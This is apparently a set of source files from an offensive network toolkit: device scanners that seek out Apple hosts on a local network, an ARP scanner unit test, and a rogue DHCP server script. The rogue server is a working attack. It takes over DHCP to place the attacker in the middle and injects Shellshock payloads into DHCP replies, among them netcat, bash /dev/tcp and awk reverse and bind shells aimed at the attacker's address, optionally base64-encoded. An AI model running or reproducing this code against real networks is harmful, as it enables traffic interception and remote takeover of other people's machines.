apple_device: Union[None, List[str]] = None
if len(apple_devices) == 1:
apple_device = apple_devices[0]
self.base.print_info('Only one Apple device found:')
self.base.print_success(apple_device[0] + ' (' + apple_device[1] + ') ', apple_device[2])
if len(apple_devices) > 1:
self.base.print_info('Apple devices found:')
device_index: int = 1
apple_devices_pretty_table = PrettyTable([self.base.cINFO + 'Index' + self.base.cEND,
self.base.cINFO + 'IP address' + self.base.cEND,
self.base.cINFO + 'MAC address' + self.base.cEND,
self.base.cINFO + 'Vendor' + self.base.cEND])
for apple_device in apple_devices:
apple_devices_pretty_table.add_row([str(device_index), apple_device[0],
apple_device[1], apple_device[2]])
device_index += 1
print(apple_devices_pretty_table)
device_index -= 1
current_device_index = input(self.base.c_info + 'Set device index from range (1-' +
str(device_index) + '): ')
if not current_device_index.isdigit():
self.base.print_error('Your input data is not digit!')
return None
if any([int(current_device_index) < 1, int(current_device_index) > device_index]):
self.base.print_error('Your number is not within range (1-' + str(device_index) + ')')
return None
current_device_index = int(current_device_index) - 1
apple_device = apple_devices[current_device_index]
return apple_device
except KeyboardInterrupt:
self.base.print_info('Exit')
exit(0)
except AssertionError as Error:
self.base.print_error(Error.args[0])
if exit_on_failure:
exit(1)
return None
# endregion
# region IPv4 device selection
def ipv4_device_selection(self, ipv4_devices: Union[None, List[Dict[str, str]]],
exit_on_failure: bool = False) -> Union[None, Dict[str, str]]:
try:
assert ipv4_devices is not None, 'List of IPv4 devices is None!'
assert len(ipv4_devices) != 0, 'List of IPv4 devices is empty!'
for ipv4_device in ipv4_devices:
assert len(ipv4_device) == 3, \
'Bad dict of IPv4 device, example: ' + \
'[{"ip-address": "fd00::1", "mac-address": "12:34:56:78:90:ab", "vendor": "Apple, Inc."}]'
assert 'ip-address' in ipv4_device.keys(), \
'Bad dict of IPv4 device, example: ' + \
'[{"ip-address": "fd00::1", "mac-address": "12:34:56:78:90:ab", "vendor": "Apple, Inc."}]'
assert self.base.ip_address_validation(ipv4_device['ip-address']), \
'Bad dict of IPv4 device, example: ' + \
'[{"ip-address": "fd00::1", "mac-address": "12:34:56:78:90:ab", "vendor": "Apple, Inc."}]'
assert 'mac-address' in ipv4_device.keys(), \
'Bad dict of IPv4 device, example: ' + \
'[{"ip-address": "fd00::1", "mac-address": "12:34:56:78:90:ab", "vendor": "Apple, Inc."}]'
assert self.base.mac_address_validation(ipv4_device['mac-address']), \
'Bad dict of IPv4 device, example: ' + \
'[{"ip-address": "fd00::1", "mac-address": "12:34:56:78:90:ab", "vendor": "Apple, Inc."}]'
assert 'vendor' in ipv4_device.keys(), \
'Bad dict of IPv4 device, example: ' + \
'[{"ip-address": "fd00::1", "mac-address": "12:34:56:78:90:ab", "vendor": "Apple, Inc."}]'
ipv4_device: Union[None, Dict[str, str]] = None
# region IPv4 devices is found
# region Only one IPv4 device found
if len(ipv4_devices) == 1:
ipv4_device: Dict[str, str] = ipv4_devices[0]
self.base.print_info('Only one IPv4 device found:')
self.base.print_success(ipv4_device['ip-address'] + ' (' + ipv4_device['mac-address'] + ') ' +
ipv4_device['vendor'])
# endregion
# region More than one IPv4 device found
if len(ipv4_devices) > 1:
self.base.print_success('Found ', str(len(ipv4_devices)), ' IPv4 alive hosts!')
device_index: int = 1
pretty_table = PrettyTable([self.base.info_text('Index'),
self.base.info_text('IPv4 address'),
self.base.info_text('MAC address'),
self.base.info_text('Vendor')])
for ipv4_device in ipv4_devices:
pretty_table.add_row([str(device_index), ipv4_device['ip-address'],
ipv4_device['mac-address'], ipv4_device['vendor']])
device_index += 1
print(pretty_table)
device_index -= 1
current_device_index: Union[int, str] = \
input(self.base.c_info + 'Set device index from range (1-' + str(device_index) + '): ')
assert current_device_index.isdigit(), \
'Your input data is not digit!'
current_device_index: int = int(current_device_index)
assert not any([current_device_index < 1, current_device_index > device_index]), \
'Your number is not within range (1-' + str(device_index) + ')'
current_device_index: int = int(current_device_index) - 1
ipv4_device: Dict[str, str] = ipv4_devices[current_device_index]
# endregion
# endregion
# region IPv4 devices not found
else:
if exit_on_failure:
self.base.print_error('Could not find IPv4 devices!')
exit(1)
# endregion
return ipv4_device
except KeyboardInterrupt:
self.base.print_info('Exit')
exit(0)
except AssertionError as Error:
self.base.print_error(Error.args[0])
if exit_on_failure:
exit(1)
return None
# endregion
# region IPv6 device selection
def ipv6_device_selection(self, ipv6_devices: Union[None, List[Dict[str, str]]],
exit_on_failure: bool = False) -> Union[None, Dict[str, str]]:
try:
assert ipv6_devices is not None, 'List of IPv6 devices is None!'
assert len(ipv6_devices) != 0, 'List of IPv6 devices is empty!'
for ipv6_device in ipv6_devices:
assert len(ipv6_device) == 3, \
'Bad dict of IPv6 device, example: ' + \
'[{"ip-address": "fd00::1", "mac-address": "12:34:56:78:90:ab", "vendor": "Apple, Inc."}]'
assert 'ip-address' in ipv6_device.keys(), \
'Bad dict of IPv6 device, example: ' + \
'[{"ip-address": "fd00::1", "mac-address": "12:34:56:78:90:ab", "vendor": "Apple, Inc."}]'
assert self.base.ipv6_address_validation(ipv6_device['ip-address']), \
'Bad dict of IPv6 device, example: ' + \
'[{"ip-address": "fd00::1", "mac-address": "12:34:56:78:90:ab", "vendor": "Apple, Inc."}]'
assert 'mac-address' in ipv6_device.keys(), \
'Bad dict of IPv6 device, example: ' + \
'[{"ip-address": "fd00::1", "mac-address": "12:34:56:78:90:ab", "vendor": "Apple, Inc."}]'
assert self.base.mac_address_validation(ipv6_device['mac-address']), \
'Bad dict of IPv6 device, example: ' + \
'[{"ip-address": "fd00::1", "mac-address": "12:34:56:78:90:ab", "vendor": "Apple, Inc."}]'
assert 'vendor' in ipv6_device.keys(), \
'Bad dict of IPv6 device, example: ' + \
'[{"ip-address": "fd00::1", "mac-address": "12:34:56:78:90:ab", "vendor": "Apple, Inc."}]'
ipv6_device: Union[None, Dict[str, str]] = None
# region IPv6 devices is found
# region Only one IPv6 device found
if len(ipv6_devices) == 1:
ipv6_device: Dict[str, str] = ipv6_devices[0]
self.base.print_info('Only one IPv6 device found:')
self.base.print_success(ipv6_device['ip-address'] + ' (' + ipv6_device['mac-address'] + ') ' +
ipv6_device['vendor'])
# endregion
# region More than one IPv6 device found
if len(ipv6_devices) > 1:
self.base.print_success('Found ', str(len(ipv6_devices)), ' IPv6 alive hosts!')
device_index: int = 1
pretty_table = PrettyTable([self.base.info_text('Index'),
self.base.info_text('IPv6 address'),
self.base.info_text('MAC address'),
self.base.info_text('Vendor')])
for ipv6_device in ipv6_devices:
pretty_table.add_row([str(device_index), ipv6_device['ip-address'],
ipv6_device['mac-address'], ipv6_device['vendor']])
device_index += 1
print(pretty_table)
device_index -= 1
current_device_index: Union[int, str] = \
input(self.base.c_info + 'Set device index from range (1-' + str(device_index) + '): ')
assert current_device_index.isdigit(), \
'Your input data is not digit!'
current_device_index: int = int(current_device_index)
assert not any([current_device_index < 1, current_device_index > device_index]), \
'Your number is not within range (1-' + str(device_index) + ')'
current_device_index: int = int(current_device_index) - 1
ipv6_device: Dict[str, str] = ipv6_devices[current_device_index]
# endregion
# endregion
# region IPv6 devices not found
else:
if exit_on_failure:
self.base.print_error('Could not find IPv6 devices!')
exit(1)
# endregion
return ipv6_device
except KeyboardInterrupt:
self.base.print_info('Exit')
exit(0)
except AssertionError as Error:
self.base.print_error(Error.args[0])
if exit_on_failure:
exit(1)
return None
# endregion
# region Find all devices in local network
def find_ip_in_local_network(self,
network_interface: str = 'eth0',
timeout: int = 3, retry: int = 3,
show_scan_percentage: bool = True,
exit_on_failure: bool = True) -> Union[None, List[str]]:
try:
local_network_ip_addresses: List[str] = list()
arp_scan_results = self.arp_scan.scan(network_interface=network_interface, timeout=timeout,
retry=retry, exit_on_failure=False, check_vendor=True,
show_scan_percentage=show_scan_percentage)
assert len(arp_scan_results) != 0, \
'Could not find network devices on interface: ' + self.base.error_text(network_interface)
for device in arp_scan_results:
if self.base.ip_address_validation(device['ip-address']):
local_network_ip_addresses.append(device['ip-address'])
return local_network_ip_addresses
except KeyboardInterrupt:
self.base.print_info('Exit')
exit(0)
except AssertionError as Error:
self.base.print_error(Error.args[0])
if exit_on_failure:
exit(1)
return None
# endregion
# region Find Apple devices in local network with arp_scan
def find_apple_devices_by_mac(self, network_interface: str = 'eth0',
timeout: int = 3, retry: int = 3,
show_scan_percentage: bool = True,
exit_on_failure: bool = True) -> Union[None, List[List[str]]]:
try:
apple_devices: List[List[str]] = list()
arp_scan_results = self.arp_scan.scan(network_interface=network_interface, timeout=timeout,
retry=retry, exit_on_failure=False, check_vendor=True,
show_scan_percentage=show_scan_percentage)
assert len(arp_scan_results) != 0, \
'Could not find network devices on interface: ' + self.base.error_text(network_interface)
for device in arp_scan_results:
if 'Apple' in device['vendor']:
apple_devices.append([device['ip-address'], device['mac-address'], device['vendor']])
assert len(apple_devices) != 0, \
'Could not find Apple devices on interface: ' + self.base.error_text(network_interface)
return apple_devices
except KeyboardInterrupt:
self.base.print_info('Exit')
exit(0)
except AssertionError as Error:
self.base.print_error(Error.args[0])
if exit_on_failure:
exit(1)
return None
# endregion
# region Find Apple devices in local network with ICMPv6 scan
def find_apple_devices_by_mac_ipv6(self, network_interface: str = 'eth0',
timeout: int = 5, retry: int = 3,
exit_on_failure: bool = True) -> Union[None, List[List[str]]]:
try:
apple_devices: List[List[str]] = list()
icmpv6_scan_results = self.icmpv6_scan.scan(network_interface=network_interface, timeout=timeout,
retry=retry, exit_on_failure=False, check_vendor=True)
assert len(icmpv6_scan_results) != 0, \
'Could not find IPv6 network devices on interface: ' + self.base.error_text(network_interface)
for device in icmpv6_scan_results:
if 'Apple' in device['vendor']:
apple_devices.append([device['ip-address'], device['mac-address'], device['vendor']])
assert len(apple_devices) != 0, \
'Could not find Apple devices on interface: ' + self.base.error_text(network_interface)
return apple_devices
except KeyboardInterrupt:
self.base.print_info('Exit')
exit(0)
except AssertionError as Error:
self.base.print_error(Error.args[0])
if exit_on_failure:
exit(1)
return None
# endregion
# region Find IPv6 devices in local network with icmpv6_scan
def find_ipv6_devices(self, network_interface: str = 'eth0',
timeout: int = 5, retry: int = 3,
exclude_ipv6_addresses: Union[None, List[str]] = None,
exit_on_failure: bool = True) -> Union[None, List[Dict[str, str]]]:
try:
ipv6_devices: List[Dict[str, str]] = list()
ipv6_scan_results = self.icmpv6_scan.scan(network_interface=network_interface, timeout=timeout, retry=retry,
target_mac_address=None, check_vendor=True, exit_on_failure=False)
assert len(ipv6_scan_results) != 0, \
'Could not find IPv6 network devices on interface: ' + self.base.error_text(network_interface)
for device in ipv6_scan_results:
if exclude_ipv6_addresses is not None:
if device['ip-address'] not in exclude_ipv6_addresses:
ipv6_devices.append(device)
else:
ipv6_devices.append(device)
assert len(ipv6_devices) != 0, \
'Could not find IPv6 devices on interface: ' + self.base.error_text(network_interface)
return ipv6_devices
except KeyboardInterrupt:
self.base.print_info('Exit')
exit(0)
except AssertionError as Error:
self.base.print_error(Error.args[0])
if exit_on_failure:
exit(1)
return None
# endregion
# region Find Apple devices in local network with nmap
def find_apple_devices_with_nmap(self, network_interface: str = 'eth0',
exit_on_failure: bool = True) -> Union[None, List[List[str]]]:
try:
if isfile(Scanner.nmap_scan_result):
remove(Scanner.nmap_scan_result)
local_network_devices: List[List[str]] = list()
apple_devices: List[List[str]] = list()
local_network = self.base.get_first_ip_on_interface(network_interface) + '-' + \
self.base.get_last_ip_on_interface(network_interface).split('.')[3]
self.base.print_info('Start nmap scan: ', 'nmap ' + local_network + ' -n -O --osscan-guess -T5 -e ' +
network_interface + ' -oX ' + Scanner.nmap_scan_result)
nmap_process = sub.Popen(['nmap ' + local_network + ' -n -O --osscan-guess -T5 -e ' +
network_interface + ' -oX ' + Scanner.nmap_scan_result],
shell=True, stdout=sub.PIPE)
nmap_process.wait()
nmap_report = ET.parse(Scanner.nmap_scan_result)
root_tree = nmap_report.getroot()
for element in root_tree:
if element.tag == 'host':
state = element.find('status').attrib['state']
if state == 'up':
ip_address: str = ''
mac_address: str = ''
description: str = ''
for address in element.findall('address'):
if address.attrib['addrtype'] == 'ipv4':
ip_address = address.attrib['addr']
if address.attrib['addrtype'] == 'mac':
mac_address = address.attrib['addr'].lower()
try:
description = address.attrib['vendor'] + ' device'
except KeyError:
pass
for os_info in element.find('os'):
if os_info.tag == 'osmatch':
try:
description += ', ' + os_info.attrib['name']
except TypeError:
pass
break
local_network_devices.append([ip_address, mac_address, description])
assert len(local_network_devices) != 0, \
'Could not find any devices on interface: ' + self.base.error_text(network_interface)
for network_device in local_network_devices:
if 'Apple' in network_device[2] or 'Mac OS' in network_device[2] or 'iOS' in network_device[2]:
apple_devices.append(network_device)
assert len(apple_devices) != 0, \
'Could not find Apple devices on interface: ' + self.base.error_text(network_interface)
return apple_devices
except OSError:
self.base.print_error('Something went wrong while trying to run ', '`nmap`')
exit(2)
except KeyboardInterrupt:
self.base.print_info('Exit')
exit(0)
except AssertionError as Error:
self.base.print_error(Error.args[0])
if exit_on_failure:
exit(1)
return None
# endregion
# endregion
```
#### File: Unit_tests/Scanners/test_arp_scanner.py
```python
from sys import path
from os.path import dirname, abspath
import unittest
# endregion
# region Authorship information
__author__ = '<NAME>'
__copyright__ = 'Copyright 2020, Raw-packet Project'
__credits__ = ['']
__license__ = 'MIT'
__version__ = '0.2.1'
__maintainer__ = '<NAME>'
__email__ = '<EMAIL>'
__status__ = 'Development'
# endregion
# region Main class - NetworkTest
class ArpScanTest(unittest.TestCase):
# region Properties
path.append(dirname(dirname(dirname(dirname(dirname(abspath(__file__)))))))
from raw_packet.Scanners.arp_scanner import ArpScan
from raw_packet.Tests.Unit_tests.variables import Variables
arp_scan: ArpScan = ArpScan()
# endregion
def test01_scan(self):
arp_scan_results = self.arp_scan.scan(network_interface=ArpScanTest.Variables.test_network_interface,
timeout=1, retry=1, show_scan_percentage=False)
self.assertIsNotNone(arp_scan_results)
find_router_mac: bool = False
find_router_ip: bool = False
for arp_scan_result in arp_scan_results:
if arp_scan_result['mac-address'] == ArpScanTest.Variables.router_mac_address:
find_router_mac = True
if arp_scan_result['ip-address'] == ArpScanTest.Variables.router_ipv4_address:
find_router_ip = True
self.assertTrue(find_router_mac)
self.assertTrue(find_router_ip)
def test02_scan_with_exclude(self):
arp_scan_results = self.arp_scan.scan(network_interface=ArpScanTest.Variables.test_network_interface,
timeout=1, retry=1, show_scan_percentage=False,
exclude_ip_addresses=[ArpScanTest.Variables.router_ipv4_address],
exit_on_failure=False)
find_router_mac: bool = False
find_router_ip: bool = False
for arp_scan_result in arp_scan_results:
if arp_scan_result['mac-address'] == ArpScanTest.Variables.router_mac_address:
find_router_mac = True
if arp_scan_result['ip-address'] == ArpScanTest.Variables.router_ipv4_address:
find_router_ip = True
self.assertFalse(find_router_mac)
self.assertFalse(find_router_ip)
def test03_get_mac_address(self):
mac_address = self.arp_scan.get_mac_address(network_interface=ArpScanTest.Variables.test_network_interface,
target_ip_address=ArpScanTest.Variables.router_ipv4_address,
timeout=1, retry=1, show_scan_percentage=False)
self.assertEqual(mac_address, ArpScanTest.Variables.router_mac_address)
# endregion
```
#### File: Scripts/DHCPv4/dhcp_rogue_server.py
```python
from sys import path
from os.path import dirname, abspath
from sys import exit
from argparse import ArgumentParser
from socket import socket, AF_PACKET, SOCK_RAW, htons
from os import makedirs
from shutil import copyfile
from base64 import b64encode
from netaddr import IPAddress
from time import sleep
from random import randint
from typing import Union, List, Dict
import subprocess as sub
# endregion
# region Authorship information
__author__ = '<NAME>'
__copyright__ = 'Copyright 2020, Raw-packet Project'
__credits__ = ['']
__license__ = 'MIT'
__version__ = '0.2.1'
__maintainer__ = '<NAME>'
__email__ = '<EMAIL>'
__status__ = 'Development'
# endregion
# region Get free IP addresses in local network
def get_free_ip_addresses() -> None:
# Get all IP addresses in range from first to last offer IP address
current_ip_address = first_offer_ip_address
while base.ip_address_compare(current_ip_address, last_offer_ip_address, 'le'):
free_ip_addresses.append(current_ip_address)
current_ip_address = base.ip_address_increment(current_ip_address)
base.print_info('ARP scan on interface: ', current_network_interface, ' is running ...')
alive_hosts = scanner.find_ip_in_local_network(current_network_interface)
for ip_address in alive_hosts:
try:
free_ip_addresses.remove(ip_address)
except ValueError:
pass
# endregion
# region Add client info in clients dictionary
def add_client_info_in_dictionary(client_mac_address: str,
client_info: Union[bool, str, Dict[str, Union[bool, str]]],
this_client_already_in_dictionary: bool = False) -> None:
if this_client_already_in_dictionary:
clients[client_mac_address].update(client_info)
else:
clients[client_mac_address] = client_info
# endregion
# region Make DHCP offer packet
def make_dhcp_offer_packet(transaction_id: int, offer_ip: str, client_mac: str,
destination_mac: Union[None, str] = None,
destination_ip: Union[None, str] = None) -> Union[None, bytes]:
if destination_mac is None:
destination_mac = 'ff:ff:ff:ff:ff:ff'
if destination_ip is None:
destination_ip = '255.255.255.255'
return dhcp.make_response_packet(ethernet_src_mac=dhcp_server_mac_address,
ethernet_dst_mac=destination_mac,
ip_src=dhcp_server_ip_address,
ip_dst=destination_ip,
transaction_id=transaction_id,
dhcp_message_type=2,
your_client_ip=offer_ip,
client_mac=client_mac,
dhcp_server_id=dhcp_server_ip_address,
lease_time=args.lease_time,
netmask=network_mask,
router=router_ip_address,
dns=dns_server_ip_address,
payload=None)
# endregion
# region Make DHCP ack packet
def make_dhcp_ack_packet(transaction_id: int, target_mac: str, target_ip: str,
destination_mac: Union[None, str] = None,
destination_ip: Union[None, str] = None,
shellshock_payload: Union[None, str] = None) -> Union[None, bytes]:
if destination_mac is None:
destination_mac: str = 'ff:ff:ff:ff:ff:ff'
if destination_ip is None:
destination_ip: str = '255.255.255.255'
if wpad_url is not None:
wpad_url_bytes = wpad_url.encode('utf-8')
else:
wpad_url_bytes = None
return dhcp.make_response_packet(ethernet_src_mac=dhcp_server_mac_address,
ethernet_dst_mac=destination_mac,
ip_src=dhcp_server_ip_address,
ip_dst=destination_ip,
transaction_id=transaction_id,
dhcp_message_type=5,
your_client_ip=target_ip,
client_mac=target_mac,
dhcp_server_id=dhcp_server_ip_address,
lease_time=args.lease_time,
netmask=network_mask,
router=router_ip_address,
dns=dns_server_ip_address,
payload=shellshock_payload,
payload_option_code=args.shellshock_option_code,
proxy=wpad_url_bytes,
domain=domain,
tftp=tftp_server_ip_address,
wins=wins_server_ip_address)
# endregion
# region Make DHCP nak packet
def make_dhcp_nak_packet(transaction_id: int, target_mac: str,
target_ip: str, requested_ip: str) -> Union[None, bytes]:
return dhcp.make_nak_packet(ethernet_src_mac=dhcp_server_mac_address,
ethernet_dst_mac=target_mac,
ip_src=dhcp_server_ip_address,
ip_dst=requested_ip,
transaction_id=transaction_id,
your_client_ip=target_ip,
client_mac=target_mac,
dhcp_server_id=dhcp_server_ip_address)
# return dhcp.make_nak_packet(source_mac=dhcp_server_mac_address,
# destination_mac=target_mac,
# source_ip=dhcp_server_ip_address,
# destination_ip=requested_ip,
# transaction_id=transaction_id,
# your_ip=target_ip,
# client_mac=target_mac,
# dhcp_server_id=dhcp_server_ip_address)
# endregion
# region Send DHCP discover packets
def discover_sender(number_of_packets=999999) -> None:
packet_index = 0
discover_socket = socket(AF_PACKET, SOCK_RAW)
discover_socket.bind((current_network_interface, 0))
if dhcp_discover_packets_source_mac != your_mac_address:
relay_agent_ip_address = base.get_random_ip_on_interface(current_network_interface)
else:
relay_agent_ip_address = your_ip_address
while packet_index < number_of_packets:
try:
discover_socket.send(dhcp.make_discover_packet(ethernet_src_mac=dhcp_discover_packets_source_mac,
client_mac=eth.make_random_mac(),
host_name=base.make_random_string(),
relay_agent_ip=relay_agent_ip_address))
sleep(args.discover_delay)
except TypeError:
base.print_error('Something went wrong when sending DHCP discover packets!')
break
packet_index += 1
discover_socket.close()
# endregion
# region Reply to DHCP and ARP requests
def reply(request):
# region Define global variables
# global raw_socket
# global clients
# global target_ip_address
# global router_ip_address
# global payload
# global shellshock_payload
# global args
# global discover_sender_is_work
# endregion
# region DHCP
if 'DHCPv4' in request.keys():
# region Get transaction id and client MAC address
transaction_id = request['BOOTP']['transaction-id']
client_mac_address = request['BOOTP']['client-mac-address']
# endregion
# region Check this client already in dict
client_already_in_dictionary = False
if client_mac_address in clients.keys():
client_already_in_dictionary = True
# endregion
# region DHCP DISCOVER
if request['DHCPv4'][53] == 1:
# region Print INFO message
base.print_info('DHCP DISCOVER from: ', client_mac_address, ' transaction id: ', hex(transaction_id))
# endregion
# If parameter 'Do not send DHCP OFFER packets' is not set
if not args.dnsop:
# region Start DHCP discover sender
if args.send_discover:
if not discover_sender_is_work:
discover_sender(100)
# endregion
# If target IP address is set - offer IP = target IP
if target_ip_address is not None:
offer_ip_address = target_ip_address
# If target IP address is not set - offer IP = random IP from free IP addresses list
else:
random_index = randint(0, len(free_ip_addresses))
offer_ip_address = free_ip_addresses[random_index]
# Delete offer IP from free IP addresses list
del free_ip_addresses[random_index]
if args.broadcast_response:
offer_packet = make_dhcp_offer_packet(transaction_id, offer_ip_address, client_mac_address)
else:
offer_packet = make_dhcp_offer_packet(transaction_id, offer_ip_address, client_mac_address,
client_mac_address, offer_ip_address)
raw_socket.send(offer_packet)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{'transaction': transaction_id, 'discover': True,
'offer_ip': offer_ip_address},
client_already_in_dictionary)
# Print INFO message
base.print_info('DHCP OFFER to: ', client_mac_address, ' offer IP: ', offer_ip_address)
# endregion
# region DHCP RELEASE
if request['DHCPv4'][53] == 7:
if request['BOOTP']['client-ip-address'] is not None:
client_ip = request['BOOTP']['client-ip-address']
base.print_info('DHCP RELEASE from: ', client_ip + ' (' + client_mac_address + ')',
' transaction id: ', hex(transaction_id))
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{'client_ip': client_ip},
client_already_in_dictionary)
# print clients
# Add release client IP in free IP addresses list
if client_ip not in free_ip_addresses:
free_ip_addresses.append(client_ip)
else:
base.print_info('DHCP RELEASE from: ', client_mac_address, ' transaction id: ', hex(transaction_id))
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{'release': True},
client_already_in_dictionary)
# print clients
# endregion
# region DHCP INFORM
if request['DHCPv4'][53] == 8:
if request['BOOTP']['client-ip-address'] is not None:
client_ip = request['BOOTP']['client-ip-address']
base.print_info('DHCP INFORM from: ', client_ip + ' (' + client_mac_address + ')',
' transaction id: ', hex(transaction_id))
# If client IP in free IP addresses list delete this
if client_ip in free_ip_addresses:
free_ip_addresses.remove(client_ip)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{'client_ip': client_ip},
client_already_in_dictionary)
# print clients
else:
base.print_info('DHCP INFORM from: ', client_mac_address, ' transaction id: ', hex(transaction_id))
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{'inform': True},
client_already_in_dictionary)
# print clients
# endregion
# region DHCP REQUEST
if request['DHCPv4'][53] == 3:
# region Set local variables
requested_ip = '0.0.0.0'
offer_ip = None
# endregion
# region Get requested IP
if 50 in request['DHCPv4'].keys():
requested_ip = str(request['DHCPv4'][50])
# endregion
# region Print info message
base.print_info('DHCP REQUEST from: ', client_mac_address, ' transaction id: ', hex(transaction_id),
' requested ip: ', requested_ip)
# endregion
# region Requested IP not in range from first offer IP to last offer IP
if not base.ip_address_in_range(requested_ip, first_offer_ip_address, last_offer_ip_address):
base.print_warning('Client: ', client_mac_address, ' requested IP: ', requested_ip,
' not in range: ', first_offer_ip_address + ' - ' + last_offer_ip_address)
# endregion
# region Requested IP in range from first offer IP to last offer IP
else:
# region Start DHCP discover sender
if args.send_discover:
if not discover_sender_is_work:
discover_sender(100)
# endregion
# region Change client info in global clients dictionary
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{'request': True, 'requested_ip': requested_ip,
'transaction': transaction_id},
client_already_in_dictionary)
# Delete ARP mitm success keys in dictionary for this client
clients[client_mac_address].pop('client request his ip', None)
clients[client_mac_address].pop('client request router ip', None)
clients[client_mac_address].pop('client request dns ip', None)
# endregion
# region Get offer IP address
try:
offer_ip = clients[client_mac_address]['offer_ip']
except KeyError:
pass
# endregion
# region This client already send DHCP DISCOVER and offer IP != requested IP
if offer_ip is not None and offer_ip != requested_ip:
# Print error message
base.print_error('Client: ', client_mac_address, ' requested IP: ', requested_ip,
' not like offer IP: ', offer_ip)
# Create and send DHCP nak packet
nak_packet = make_dhcp_nak_packet(transaction_id, client_mac_address, offer_ip, requested_ip)
raw_socket.send(nak_packet)
base.print_info('DHCP NAK to: ', client_mac_address, ' requested ip: ', requested_ip)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{'mitm': 'error: offer ip not like requested ip', 'offer_ip': None},
client_already_in_dictionary)
# print clients
# endregion
# region Offer IP == requested IP or this is a first request from this client
else:
# region Target IP address is set and requested IP != target IP
if target_ip_address is not None and requested_ip != target_ip_address:
# Print error message
base.print_error('Client: ', client_mac_address, ' requested IP: ', requested_ip,
' not like target IP: ', target_ip_address)
# Create and send DHCP nak packet
nak_packet = make_dhcp_nak_packet(transaction_id, client_mac_address,
target_ip_address, requested_ip)
raw_socket.send(nak_packet)
base.print_info('DHCP NAK to: ', client_mac_address, ' requested ip: ', requested_ip)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{'mitm': 'error: target ip not like requested ip',
'offer_ip': None, 'nak': True},
client_already_in_dictionary)
# endregion
# region Target IP address is set and requested IP == target IP or Target IP is not set
else:
# region Settings shellshock payload
payload: Union[None, str] = None
shellshock_payload: Union[None, str] = None
try:
assert args.shellshock_command is not None \
or args.bind_shell \
or args.nc_reverse_shell \
or args.nce_reverse_shell \
or args.bash_reverse_shell, 'ShellShock not used!'
# region Create payload
# Network settings command in target machine
net_settings = args.ip_path + 'ip addr add ' + requested_ip + '/' + \
str(IPAddress(network_mask).netmask_bits()) + ' dev ' + args.iface_name + ';'
# Shellshock payload: <user bash command>
if args.shellshock_command is not None:
payload = args.shellshock_command
# Shellshock payload:
# awk 'BEGIN{s='/inet/tcp/<bind_port>/0/0';for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}' &
if args.bind_shell:
payload = 'awk \'BEGIN{s=\'/inet/tcp/' + str(args.bind_port) + \
'/0/0\';for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}\' &'
# Shellshock payload:
# rm /tmp/f 2>/dev/null;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your_ip> <your_port> >/tmp/f &
if args.nc_reverse_shell:
payload = 'rm /tmp/f 2>/dev/null;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ' + \
your_ip_address + ' ' + str(args.reverse_port) + ' >/tmp/f &'
# Shellshock payload:
# /bin/nc -e /bin/sh <your_ip> <your_port> 2>&1 &
if args.nce_reverse_shell:
payload = '/bin/nc -e /bin/sh ' + your_ip_address + ' ' + str(args.reverse_port) + ' 2>&1 &'
# Shellshock payload:
# /bin/bash -i >& /dev/tcp/<your_ip>/<your_port> 0>&1 &
if args.bash_reverse_shell:
payload = '/bin/bash -i >& /dev/tcp/' + your_ip_address + \
'/' + str(args.reverse_port) + ' 0>&1 &'
if payload is not None:
# Do not add network settings command in payload
if not args.without_network:
payload = net_settings + payload
# Send payload to target in clear text
if args.without_base64:
shellshock_payload = '() { :; }; ' + payload
# Send base64 encoded payload to target in clear text
else:
payload = b64encode(payload)
shellshock_payload = '() { :; }; /bin/sh <(/usr/bin/base64 -d <<< ' + payload + ')'
# endregion
# region Check Shellshock payload length
if shellshock_payload is not None:
if len(shellshock_payload) > 255:
base.print_error('Length of shellshock payload is very big! Current length: ',
str(len(shellshock_payload)), ' Maximum length: ', '254')
shellshock_payload = None
# endregion
except AssertionError:
pass
# endregion
# region Send DHCP ack and print info message
if args.broadcast_response:
ack_packet = make_dhcp_ack_packet(transaction_id=transaction_id,
target_mac=client_mac_address,
target_ip=requested_ip,
shellshock_payload=shellshock_payload)
else:
ack_packet = make_dhcp_ack_packet(transaction_id=transaction_id,
target_mac=client_mac_address,
target_ip=requested_ip,
destination_mac=client_mac_address,
destination_ip=requested_ip,
shellshock_payload=shellshock_payload)
if args.apple:
base.print_info('DHCP ACK to: ', client_mac_address, ' requested ip: ', requested_ip)
for _ in range(3):
raw_socket.send(ack_packet)
sleep(0.2)
else:
raw_socket.send(ack_packet)
base.print_info('DHCP ACK to: ', client_mac_address, ' requested ip: ', requested_ip)
# endregion
# region Add client info in global clients dictionary
try:
clients[client_mac_address].update({'mitm': 'success'})
except KeyError:
clients[client_mac_address] = {'mitm': 'success'}
# endregion
# endregion
# endregion
# endregion
# endregion
# region DHCP DECLINE
if request['DHCPv4'][53] == 4:
# Get requested IP
requested_ip = '0.0.0.0'
if 50 in request['DHCPv4'].keys():
requested_ip = str(request['DHCPv4'][50])
# Print info message
base.print_info('DHCP DECLINE from: ', requested_ip + ' (' + client_mac_address + ')',
' transaction id: ', hex(transaction_id))
# If client IP in free IP addresses list delete this
if requested_ip in free_ip_addresses:
free_ip_addresses.remove(requested_ip)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{'decline_ip': requested_ip, 'decline': True},
client_already_in_dictionary)
# print clients
# endregion
# endregion DHCP
# region ARP
if 'ARP' in request.keys():
if request['Ethernet']['destination'] == 'ff:ff:ff:ff:ff:ff' and \
request['ARP']['target-mac'] == '00:00:00:00:00:00':
# region Set local variables
arp_sender_mac_address = request['ARP']['sender-mac']
arp_sender_ip_address = request['ARP']['sender-ip']
arp_target_ip_address = request['ARP']['target-ip']
# endregion
# region Print info message
base.print_info('ARP request from: ', arp_sender_mac_address,
' "Who has ', arp_target_ip_address, ' Tell ', arp_sender_ip_address, '"')
# endregion
# region Get client mitm status
try:
mitm_status = clients[arp_sender_mac_address]['mitm']
except KeyError:
mitm_status = ''
